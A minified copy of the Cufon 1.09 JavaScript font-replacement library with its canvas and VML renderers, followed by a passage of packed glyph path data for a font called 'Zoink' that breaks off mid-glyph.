// CuFon JS

/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
// Zoink Font
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * \2511995 Active Images/Comicraft. All rights reserved. Unauthorized duplication
 * and/or use is a violation of applicable laws.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"74,9v71,-14,113,-76,103,-163v-6,-51,-63,-53,-105,-23v22,-37,43,-76,78,-100r-74,-9v-40,51,-64,117,-76,193v-10,58,14,114,74,102xm107,-146v41,7,5,80,-12,92v-20,15,-43,-2,-36,-31v7,-29,20,-53,48,-61","w":177},{"d":"42,-23v4,32,46,37,67,15v32,-35,70,-125,39,-184v-21,-40,-71,5,-90,22v6,-53,20,-108,31,-150r-69,28v-12,88,-13,198,-11,297r32,1xm78,-41v-20,11,-22,-18,-22,-38v1,-36,12,-73,35,-83v28,19,5,101,-13,121","w":172},{"d":"81,0v90,-17,121,-105,121,-206v0,-48,-30,-83,-85,-76v-106,13,-153,165,-92,260v11,17,27,27,56,22xm104,-62v-30,23,-42,-17,-40,-50v5,-55,13,-116,50,-131v41,29,9,144,-10,181","w":198},{"d":"99,-56v0,-37,-64,-12,-72,8v-8,20,-4,45,22,42v30,-3,50,-20,50,-50","w":140},{"d":"20,-215v38,21,91,-24,64,-57v-32,-20,-85,20,-64,57xm15,-183v-3,56,2,122,1,178r37,-14r32,-183","w":85},{"d":"122,-233v14,5,14,26,17,42r47,-46v-6,-49,-73,-56,-104,-19v-53,40,-96,165,-48,241v27,43,114,22,132,-12v4,-8,9,-12,12,-18r-33,-55v-10,23,-24,54,-48,62v-33,-36,-10,-141,8,-183v4,-9,10,-12,17,-12","w":184},{"d":"63,-114v12,-14,17,-26,31,-30v15,41,-6,113,-9,163r51,-20v10,-48,17,-101,18,-158v1,-21,1,-41,-17,-41v-35,0,-51,23,-72,52v2,-63,13,-103,24,-154r-73,24r-3,282r49,-20","w":162},{"d":"91,-307r-77,23r-7,229v0,23,1,46,2,65r33,-15r22,-176","w":79},{"d":"136,-276v-32,-34,-106,-7,-116,32v-17,65,27,102,47,146v2,47,-59,31,-70,5r6,85v46,40,135,7,135,-59v0,-57,-29,-87,-53,-117v-13,-16,-3,-62,21,-50v8,5,20,17,24,25"},{"d":"158,-314v-35,6,-74,17,-101,32r-40,182r47,-9v23,-73,62,-143,94,-205xm-4,-24v4,44,76,19,80,-11v10,-23,-8,-40,-30,-40v-28,0,-53,18,-50,51","w":102},{"d":"103,-173v-12,-39,-79,-10,-77,23v-3,19,7,29,26,28v31,-1,49,-21,51,-51xm89,-19v12,-18,19,-60,-11,-61v-29,-1,-70,32,-55,64v8,7,23,5,33,-2v0,40,-27,58,-44,79v33,-15,57,-51,77,-80","w":115},{"w":1080},{"d":"59,22v69,-47,120,-95,143,-189v28,-113,-104,-132,-184,-86r-6,226xm85,-235v78,-11,53,104,22,145v-10,14,-21,27,-35,39","w":200},{"d":"14,19v34,-25,80,-43,124,-60r-6,-62v-28,11,-62,32,-86,48v22,-46,64,-87,97,-120r-11,-53r-111,23v-5,17,-9,40,-10,59r86,-20v-37,29,-71,78,-103,112v1,29,11,52,20,73","w":143},{"d":"98,-89v-7,22,-36,41,-34,4v2,-41,12,-79,23,-112r-68,19v-15,60,-39,164,50,151v11,-2,21,-7,33,-13v-6,33,-12,71,-32,89v-6,6,-13,1,-16,-9v-3,-10,-3,-26,0,-50r-66,32v-14,81,84,69,119,34v54,-55,67,-162,72,-267r-62,21v-1,42,-10,73,-19,101","w":181},{"d":"43,-212v28,0,79,-50,33,-63v-29,-8,-65,23,-51,53v4,7,10,10,18,10xm-6,-36v-23,9,-47,24,-71,40v2,48,40,90,89,64v73,-39,64,-164,78,-262r-63,23v-8,67,8,156,-21,203v-10,10,-12,-4,-14,-14v-2,-16,-1,-39,2,-54","w":100},{"d":"81,-4v101,-4,121,-101,116,-204v-3,-57,-53,-89,-111,-68v-84,31,-121,202,-44,262v11,9,24,11,39,10xm89,-56v-47,-25,-16,-141,8,-173v7,-10,23,-20,28,-4v18,55,2,134,-24,169v-4,5,-8,8,-12,8","w":199},{"d":"76,-166v16,-20,35,3,37,21r36,-25v-12,-29,-42,-59,-81,-42v-71,32,-106,246,23,225v23,-4,40,-23,52,-40r-27,-49v-6,26,-45,70,-59,22v-10,-39,1,-88,19,-112","w":153},{"d":"82,-77v23,-63,69,-119,112,-162r-13,-51r-125,24r-20,78v25,-11,57,-20,86,-27v-49,49,-94,117,-127,182v10,19,18,39,23,65r65,-38r77,-35r3,-72","w":169},{"d":"75,-118v27,-20,46,-42,68,-66r-36,-42v-14,23,-32,50,-53,73v9,-58,18,-117,38,-164r-78,28v-9,92,-7,203,-10,300r41,-14r3,-77v13,33,27,61,45,91r46,-35v-23,-30,-47,-57,-64,-94","w":144},{"d":"206,-228r-32,2r15,-38r-57,14r-5,29r-28,3r12,-55r-54,19r-6,42v-35,-2,-30,32,-39,59v12,-4,22,-7,35,-9r-1,23v-27,1,-23,35,-32,58v12,-3,22,-6,33,-9r2,41r36,-7r1,-42r27,-5r-3,57r37,-4r5,-58v10,-2,25,2,23,-12v3,-11,5,-25,11,-33r-29,2r6,-31r29,-3v4,-15,6,-33,14,-43xm89,-144r2,-27r30,-5r-4,29","w":194},{"d":"33,-79v-19,9,-26,18,-38,32v10,61,110,83,124,10v12,-65,-49,-74,-53,-131v-2,-15,20,-30,25,-9v2,10,5,22,6,34r45,-24v-1,-33,-13,-52,-43,-55v-71,-7,-107,78,-54,122v14,12,40,40,26,59v-21,2,-30,-21,-38,-38","w":135},{"d":"66,-8v-6,-30,2,-78,5,-105v12,-7,36,-19,53,-22v5,-17,12,-33,14,-52r-61,18v3,-19,5,-38,11,-54r62,-19r9,-59v-40,8,-85,13,-120,26r-25,135v-8,48,-16,104,-15,159","w":133},{"d":"22,-160v1,64,-33,155,22,182v20,21,62,9,68,-16v12,-24,23,-43,28,-69r-49,-8v-2,23,-18,72,-35,41v-4,-49,20,-99,22,-150r45,-13r4,-21v-15,0,-32,4,-45,8v5,-33,16,-66,25,-92r-72,20r-11,89r-38,15r0,31v11,-6,23,-12,36,-17","w":116},{"d":"74,-116v-3,-50,-9,-109,0,-158r-69,37r3,83v9,59,13,125,27,178r67,-36v-1,-55,12,-95,24,-137r10,163r60,-20v14,-108,37,-215,78,-296r-73,7r-36,111v-3,12,-6,23,-7,31v-5,-31,-6,-79,-2,-113r-50,14","w":229},{"d":"129,9v19,-9,48,-19,67,-24r23,-107v9,-34,21,-68,34,-96r-65,5v-17,39,-26,94,-32,143v-5,-42,-15,-89,-15,-137r-32,8v-20,41,-33,81,-38,133v-9,-44,-11,-108,-3,-155r-67,31v11,65,12,141,32,196r65,-31v1,-39,9,-72,20,-97v7,40,10,86,11,131","w":233},{"d":"211,-5v8,-62,47,-131,32,-192v-30,-20,-64,16,-89,30v9,-42,-32,-54,-56,-31v-10,9,-22,20,-32,30r5,-49v-26,2,-50,9,-70,15r16,187r44,-8r3,-122v8,-8,14,-23,28,-21v10,40,-1,111,-5,155r50,-8r15,-124v10,-8,21,-25,31,-14v-5,52,-17,112,-28,162","w":248},{"d":"101,-24v-8,-57,-4,-142,8,-193v18,-3,38,-15,60,-14r-1,-60r-170,33r-15,74v0,0,-1,0,7,-3v17,-6,36,-15,55,-18r-24,170v-2,21,-3,40,-4,57v24,-15,56,-35,84,-46","w":136},{"d":"161,-28r4,-71r-92,31v-4,-25,2,-49,6,-70r67,-21r2,-46r-65,20r8,-51r67,-18r3,-38r-131,26r-30,237r43,43","w":162},{"d":"173,-160v0,-31,-9,-65,-37,-67v-38,-3,-50,22,-68,44r1,-42r-65,24r16,289r43,-15r1,-100v6,11,13,20,27,22v65,-10,82,-83,82,-155xm84,-49v-28,-31,-12,-123,19,-136v36,20,16,132,-19,136","w":181},{"d":"18,8v17,-7,40,-11,59,-16v-8,-55,-36,-138,3,-179v16,-8,17,14,16,31r-2,18r51,-26v-2,-30,-2,-62,-33,-62v-27,0,-41,16,-53,32v0,-11,-3,-24,-1,-34v-17,1,-32,11,-46,16v-5,70,1,152,6,220","w":132},{"d":"32,-33v23,34,80,43,105,8v13,13,23,34,34,48r38,-41v-14,-13,-27,-30,-36,-48v44,-66,48,-217,-52,-217v-102,0,-150,160,-89,250xm108,-229v43,7,44,77,33,120r-17,-33r-32,37v7,12,17,26,23,39v-24,29,-41,-10,-46,-36v-10,-54,0,-112,39,-127","w":209},{"w":97},{"d":"99,-16v-2,-104,31,-183,80,-237r-20,-42v-45,6,-96,13,-132,29r-14,78v27,-20,56,-30,92,-42v-53,56,-79,150,-83,253v20,-18,45,-35,77,-39","w":149},{"d":"166,-216v-44,-9,-67,22,-98,42r4,-50r-66,25r6,192r46,-14r9,-122v16,-14,27,-24,43,-31v10,-1,8,9,6,20r-28,159r55,-17r36,-170v3,-16,-3,-30,-13,-34","w":180},{"d":"194,-19v-24,-30,-49,-67,-59,-110v31,-32,66,-79,91,-119r-60,-48v-17,38,-45,76,-68,107v-11,-26,-22,-64,-27,-96r-67,39v11,37,34,77,53,108v-28,36,-52,83,-69,128v17,5,41,17,54,24v9,-33,31,-62,49,-88v17,32,31,67,52,96","w":199},{"d":"111,-213v17,-8,32,-19,52,-24v-1,-37,-3,-79,-48,-66v-55,16,-89,42,-89,121v0,19,0,39,-2,62r-33,11r-2,27v8,-5,23,-12,34,-15r1,114v16,-3,32,-13,48,-16r-3,-112r37,-10r2,-18r-37,8v8,-47,2,-109,34,-132v15,1,7,33,6,50","w":116},{"d":"123,-3v20,-18,39,-43,63,-60r-58,-58v38,-26,75,-107,34,-154v-35,-27,-100,-12,-137,3r-25,287v18,-7,38,-19,61,-21r7,-76xm74,-132v2,-28,9,-64,13,-90v18,-7,30,5,24,25v-8,28,-20,43,-37,65","w":173},{"d":"20,-264v-8,82,-9,183,-4,269r58,-10v10,-96,7,-205,33,-285","w":96},{"d":"100,-19v-4,-89,4,-188,26,-256r-54,-22v-21,17,-48,39,-67,63r33,34r30,-29v-24,71,-34,158,-35,251","w":126},{"d":"159,13v-8,-121,16,-229,45,-319v-23,